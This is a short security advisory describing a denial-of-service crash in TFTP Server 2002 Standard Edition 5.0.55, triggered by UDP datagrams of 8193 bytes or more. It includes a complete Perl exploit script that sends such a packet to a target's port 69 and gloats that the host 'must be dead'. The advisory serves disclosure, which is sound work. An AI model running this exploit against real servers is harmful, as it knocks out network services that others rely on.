|
|
|
|
| |
| Many network devices require a TFTP Server to load their initial operating system or configuration. Many routers, switches, hubs, X-terminals, printers, terminal servers, etc need a TFTP server in order to load their initial configuration. A security vulnerability in the product allows remote attackers to cause the product to fail effectively causing a denial of service attack. |
| |
Credit:
The information has been provided by D4rkGr3y.
|
| |
Vulnerable systems:
TFTP Server 2002 Standard Edition version 5.0.55
It's possible to crash the TFTP server using a UDP datagram with a large packet (8193 and above). The vulnerable application on remote host will close with error message:
Run-time error '10040':
The datagram is too large to fit into the buffer and is truncated.
Exploit:
#!/usr/bin/perl
#TFTP Server remote DoS exploit by D4rkGr3y
use IO::Socket;
$host = "vulnerable_host";
$port = "69";
$data = "q";
$num = "8193";
$buf .= $data x $num;
$socket = IO::Socket::INET->new(Proto => "udp") or die "Socket error: $@\n";
$ipaddr = inet_aton($host);
$portaddr = sockaddr_in($port, $ipaddr);
send($socket, $buf, 0, $portaddr) == length($buf) or die "Can't send: $!\n";
print "Now, '$host' must be dead :)\n";
|
|
|
|
|
